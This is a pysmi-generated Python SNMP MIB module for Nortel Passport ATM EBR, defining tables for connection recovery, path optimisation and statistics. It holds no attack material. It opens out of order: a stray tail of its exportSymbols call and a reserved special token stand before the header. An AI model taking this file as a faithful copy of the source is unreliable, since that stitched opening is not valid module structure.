mscAtmIfVptVccSrcEbrOvRecoverySubscribed=
mscAtmIfVptVccSrcEbrOvRecoverySubscribed, mscAtmIfIispEbrIndex=
mscAtmIfIispEbrIndex, atmEbrCapabilitiesCA=atmEbrCapabilitiesCA,
mscAtmIfVccEbrInfoTotalConnectionRecoveries=
mscAtmIfVccEbrInfoTotalConnectionRecoveries)
<|reserved_special_token_1|>
#
# PySNMP MIB module Nortel-MsCarrier-MscPassport-AtmEbrMIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Nortel-MsCarrier-MscPassport-AtmEbrMIB
# Produced by pysmi-0.3.4 at Mon Apr 29 20:19:41 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, SingleValueConstraint, ValueSizeConstraint, ConstraintsUnion, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsUnion", "ConstraintsIntersection")
mscAtmIfIndex, mscAtmIfVptIndex, mscAtmIfVcc, mscAtmIfVptVccIndex, mscAtmIfVpc, mscAtmIfVptVcc, mscAtmIfVccIndex, mscAtmIfVpcIndex = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex", "mscAtmIfVptIndex", "mscAtmIfVcc", "mscAtmIfVptVccIndex", "mscAtmIfVpc", "mscAtmIfVptVcc", "mscAtmIfVccIndex", "mscAtmIfVpcIndex")
mscAtmIfIisp, mscAtmIfVptIisp, mscAtmIfVptIispIndex, mscAtmIfIispIndex = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIisp", "mscAtmIfVptIisp", "mscAtmIfVptIispIndex", "mscAtmIfIispIndex")
mscAtmIfVpcSrc, mscAtmIfVptVccSrcIndex, mscAtmIfVccSrcIndex, mscAtmIfVptVccSrc, mscAtmIfVpcSrcIndex, mscAtmIfVccSrc = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVpcSrc", "mscAtmIfVptVccSrcIndex", "mscAtmIfVccSrcIndex", "mscAtmIfVptVccSrc", "mscAtmIfVpcSrcIndex", "mscAtmIfVccSrc")
mscAtmIfVptPnniIndex, mscAtmIfPnniIndex, mscAtmIfPnni, mscAtmIfVptPnni = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmPnniMIB", "mscAtmIfVptPnniIndex", "mscAtmIfPnniIndex", "mscAtmIfPnni", "mscAtmIfVptPnni")
mscAtmIfVptUni, mscAtmIfUni, mscAtmIfUniIndex, mscAtmIfVptUniIndex = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfVptUni", "mscAtmIfUni", "mscAtmIfUniIndex", "mscAtmIfVptUniIndex")
Counter32, DisplayString, Gauge32, StorageType, RowStatus = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-StandardTextualConventionsMIB", "Counter32", "DisplayString", "Gauge32", "StorageType", "RowStatus")
NonReplicated, = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-TextualConventionsMIB", "NonReplicated")
mscPassportMIBs, = mibBuilder.importSymbols("Nortel-MsCarrier-MscPassport-UsefulDefinitionsMIB", "mscPassportMIBs")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Integer32, ObjectIdentity, ModuleIdentity, Bits, Counter32, IpAddress, Gauge32, NotificationType, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, Unsigned32, Counter64, TimeTicks = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "ObjectIdentity", "ModuleIdentity", "Bits", "Counter32", "IpAddress", "Gauge32", "NotificationType", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier", "Unsigned32", "Counter64", "TimeTicks")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
atmEbrMIB = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159))
mscAtmIfVpcSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2))
mscAtmIfVpcSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1), )
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRowStatusTable.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVpcSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRowStatusEntry.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRowStatus.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvComponentName.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvStorageType.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvIndex.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20), )
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvProvTable.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVpcSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvProvEntry.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRecoverySubscribed.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVpcEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11))
mscAtmIfVpcEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1), )
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRowStatusTable.setStatus('mandatory')
mscAtmIfVpcEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRowStatusEntry.setStatus('mandatory')
mscAtmIfVpcEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 1), RowStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRowStatus.setStatus('mandatory')
mscAtmIfVpcEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoComponentName.setStatus('mandatory')
mscAtmIfVpcEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoStorageType.setStatus('mandatory')
mscAtmIfVpcEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoIndex.setStatus('mandatory')
mscAtmIfVpcEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30), )
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoOperTable.setStatus('mandatory')
mscAtmIfVpcEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoOperEntry.setStatus('mandatory')
mscAtmIfVpcEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRecoverySubscribed.setStatus('mandatory')
mscAtmIfVpcEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVpcEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoConnectionRecovered.setStatus('mandatory')
mscAtmIfVpcEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40), )
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoStatsTable.setStatus('mandatory')
mscAtmIfVpcEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoStatsEntry.setStatus('mandatory')
mscAtmIfVpcEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVpcEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoTotalPathOptimizations.setStatus('mandatory')
mscAtmIfVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2))
mscAtmIfVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1), )
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRowStatusTable.setStatus('mandatory')
mscAtmIfVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVccSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRowStatusEntry.setStatus('mandatory')
mscAtmIfVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRowStatus.setStatus('mandatory')
mscAtmIfVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvComponentName.setStatus('mandatory')
mscAtmIfVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvStorageType.setStatus('mandatory')
mscAtmIfVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvIndex.setStatus('mandatory')
mscAtmIfVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20), )
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvProvTable.setStatus('mandatory')
mscAtmIfVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVccSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvProvEntry.setStatus('mandatory')
mscAtmIfVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')
mscAtmIfVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12))
mscAtmIfVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1), )
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoRowStatusTable.setStatus('mandatory')
mscAtmIfVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoRowStatusEntry.setStatus('mandatory')
mscAtmIfVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 1), RowStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoRowStatus.setStatus('mandatory')
mscAtmIfVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoComponentName.setStatus('mandatory')
mscAtmIfVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoStorageType.setStatus('mandatory')
mscAtmIfVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoIndex.setStatus('mandatory')
mscAtmIfVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30), )
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoOperTable.setStatus('mandatory')
mscAtmIfVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoOperEntry.setStatus('mandatory')
mscAtmIfVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoRecoverySubscribed.setStatus('mandatory')
mscAtmIfVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoConnectionRecovered.setStatus('mandatory')
mscAtmIfVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40), )
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoStatsTable.setStatus('mandatory')
mscAtmIfVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoStatsEntry.setStatus('mandatory')
mscAtmIfVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoTotalPathOptimizations.setStatus('mandatory')
mscAtmIfUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7))
mscAtmIfUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfUniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfUniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfUniEbrRowStatus.setStatus('mandatory')
mscAtmIfUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrComponentName.setStatus('mandatory')
mscAtmIfUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrStorageType.setStatus('mandatory')
mscAtmIfUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfUniEbrIndex.setStatus('mandatory')
mscAtmIfUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfUniEbrProvTable.setStatus('mandatory')
mscAtmIfUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfUniEbrProvEntry.setStatus('mandatory')
mscAtmIfUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfUniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfUniEbrPathOptimization.setStatus('mandatory')
mscAtmIfUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfUniEbrOperTable.setStatus('mandatory')
mscAtmIfUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfUniEbrOperEntry.setStatus('mandatory')
mscAtmIfUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfUniEbrStatsTable.setStatus('mandatory')
mscAtmIfUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfUniEbrStatsEntry.setStatus('mandatory')
mscAtmIfUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrTotalConnectionRecoveries.setStatus('mandatory')
